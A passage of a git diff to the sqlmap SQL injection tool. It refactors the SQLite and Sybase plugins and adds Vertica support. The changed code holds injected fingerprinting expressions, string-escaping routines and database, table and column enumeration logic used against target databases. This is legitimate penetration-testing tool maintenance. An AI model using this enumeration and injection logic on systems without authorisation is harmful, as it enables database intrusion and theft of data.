logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index df7d7a9696f..ad1bc2622d4 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on SQLite it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on SQLite it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 6073ab31380..5a2d7f159c6 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -45,9 +45,11 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - 
banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -64,7 +66,7 @@ def checkDbms(self): * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions """ - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES): setDbms(DBMS.SQLITE) self.getBanner() @@ -84,14 +86,14 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) + logger.warning(warnMsg) return False else: infoMsg = "actively fingerprinting %s" % DBMS.SQLITE logger.info(infoMsg) - result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0") + result = inject.checkBooleanExpression("RANDOMBLOB(-1) IS NOT NULL") version = '3' if result else '2' Backend.setVersion(version) @@ -102,7 +104,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 83c0a474151..62a9379fa50 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,27 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import binascii - -from lib.core.common import isDBMSVersionAtLeast +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): - def escaper(value): - return "X'%s'" % binascii.hexlify(value) + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97,98,99,100,101,102,103,104) FROM foobar" + True + """ - retVal = expression - - if isDBMSVersionAtLeast('3'): - retVal = Syntax._escape(expression, quote, escaper) + def escaper(value): + return "CHAR(%s)" % ','.join("%d" % _ for _ in getOrds(value)) - return retVal + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index c619f23f37f..1ed29162e6f 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on SQLite it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index 7c6eb775f77..02b471b1636 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers 
(http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = SYBASE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.SYBASE] = Syntax.escape diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index c859f9632cf..aed2d79e393 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import _mssql import pymssql -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -33,37 +34,36 @@ class Connector(GenericConnector): to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except pymssql.OperationalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + raise SqlmapConnectionException(ex) + except ValueError: + raise SqlmapConnectionException self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.OperationalError, pymssql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) + except pymssql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) return retVal diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index d51f21ac8ec..afc4bba1a78 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,39 +1,44 @@ 
#!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend +import re + from lib.core.common import filterPairValues +from lib.core.common import isListLike from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import SYBASE_TYPES +from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six +from thirdparty.six.moves import zip as _zip class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].users + rootQuery = queries[DBMS.SYBASE].users - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -42,19 +47,19 @@ def getUsers(self): blinds = (True,) for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - kb.data.cachedUsers = retVal[0].values()[0] + kb.data.cachedUsers = list(retVal[0].values())[0] break return kb.data.cachedUsers - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Sybase it is not possible to fetch " warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) + logger.warning(warnMsg) users = [] areAdmins = set() @@ -67,6 +72,8 @@ def getPrivileges(self, *args): users = kb.data.cachedUsers for user in users: + user = unArrayizeValue(user) + if user is None: continue @@ -86,8 +93,7 @@ def getDbs(self): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() + rootQuery = queries[DBMS.SYBASE].dbs query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -96,10 +102,10 @@ def getDbs(self): blinds = [True] for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - kb.data.cachedDbs = retVal[0].values()[0] + kb.data.cachedDbs = 
next(six.itervalues(retVal[0])) break if kb.data.cachedDbs: @@ -117,17 +123,17 @@ def getTables(self, bruteForce=None): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) + dbs = [_ for _ in dbs if _] infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -135,16 +141,15 @@ def getTables(self, bruteForce=None): else: blinds = [True] - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.SYBASE].tables for db in dbs: for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - for table in retVal[0].values()[0]: + for table in next(six.itervalues(retVal[0])): if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: @@ -156,7 +161,7 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -164,12 +169,12 @@ def getColumns(self, onlyColNames=False): warnMsg = "missing database parameter. 
sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -177,22 +182,25 @@ def getColumns(self, onlyColNames=False): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " @@ -200,9 +208,46 @@ def getColumns(self, onlyColNames=False): raise SqlmapNoneDataException(errMsg) for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) + tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) + + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? 
[y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.SYBASE].columns if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = [False, True] @@ -219,9 +264,9 @@ def getColumns(self, onlyColNames=False): return {conf.db: kb.data.cachedColumns[conf.db]} - if colList: + if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue @@ -231,18 +276,17 @@ def getColumns(self, onlyColNames=False): logger.info(infoMsg) for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: table = {} columns = {} - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(type_, type_) + for name, type_ in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): + columns[name] = SYBASE_TYPES.get(int(type_) if hasattr(type_, "isdigit") and type_.isdigit() else type_, type_) - table[safeSQLIdentificatorNaming(tbl)] = columns + table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table break @@ -251,26 +295,32 @@ def getColumns(self, onlyColNames=False): def searchDb(self): warnMsg = "on Sybase searching of databases is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchTable(self): warnMsg = "on Sybase searching of tables is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchColumn(self): warnMsg = "on Sybase searching of columns is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def search(self): warnMsg = "on Sybase search option is not available" - logger.warn(warnMsg) + logger.warning(warnMsg) def getHostname(self): warnMsg = "on Sybase it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Sybase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index f960c92c901..0a3e73bf7b4 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - 
GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Sybase it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Sybase it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index f63be2da2f8..64b66ba4268 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,12 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -45,9 +47,11 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -57,9 +61,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES): setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) self.getBanner() @@ -74,7 +76,7 @@ def checkDbms(self): if conf.direct: result = True else: - result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()") + result = inject.checkBooleanExpression("@@transtate=@@transtate") if result: infoMsg = "confirming %s" % DBMS.SYBASE @@ -84,7 +86,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -98,16 +100,21 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.SYBASE logger.info(infoMsg) - for version in xrange(12, 16): - result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version) + result = unArrayizeValue(inject.getValue("SUBSTRING(@@VERSION,1,1)")) + + if result and result.isdigit(): + Backend.setVersion(str(result)) + else: + for version in xrange(12, 16): + result = inject.checkBooleanExpression("PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version) - if result: - Backend.setVersion(str(version)) - break + if result: + Backend.setVersion(str(version)) + break return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index add4012605c..53f0bea1bc1 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap 
developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+TO_UNICHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + """ + def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "TO_UNICHAR", ord(value[i])) for i in xrange(len(value))) + return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "TO_UNICHAR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 026bcf7f723..ccc94f21e20 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Sybase it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/vertica/__init__.py b/plugins/dbms/vertica/__init__.py new file mode 100644 index 00000000000..2d0f69528e0 --- /dev/null +++ b/plugins/dbms/vertica/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import VERTICA_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.vertica.enumeration import Enumeration +from plugins.dbms.vertica.filesystem import Filesystem +from plugins.dbms.vertica.fingerprint import Fingerprint +from plugins.dbms.vertica.syntax import Syntax +from plugins.dbms.vertica.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class VerticaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Vertica methods + """ + + def __init__(self): + self.excludeDbsList = VERTICA_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.VERTICA] = Syntax.escape diff --git a/plugins/dbms/vertica/connector.py b/plugins/dbms/vertica/connector.py new file mode 100644 index 00000000000..bfce0ce645d --- /dev/null +++ b/plugins/dbms/vertica/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import vertica_python +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class 
Connector(GenericConnector): + """ + Homepage: https://github.com/vertica/vertica-python + User guide: https://github.com/vertica/vertica-python/blob/master/README.md + API: https://www.python.org/dev/peps/pep-0249/ + License: Apache 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = vertica_python.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port, connection_timeout=conf.timeout) + except vertica_python.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except vertica_python.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (vertica_python.OperationalError, vertica_python.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except vertica_python.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/vertica/enumeration.py b/plugins/dbms/vertica/enumeration.py new file mode 100644 index 00000000000..49ead488f66 --- /dev/null +++ b/plugins/dbms/vertica/enumeration.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getRoles(self, *args, **kwargs): + warnMsg = "on Vertica it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/vertica/filesystem.py b/plugins/dbms/vertica/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/vertica/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/vertica/fingerprint.py b/plugins/dbms/vertica/fingerprint.py new file mode 100644 index 00000000000..a98238041b1 --- /dev/null +++ b/plugins/dbms/vertica/fingerprint.py @@ -0,0 +1,106 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import VERTICA_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.VERTICA) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += 
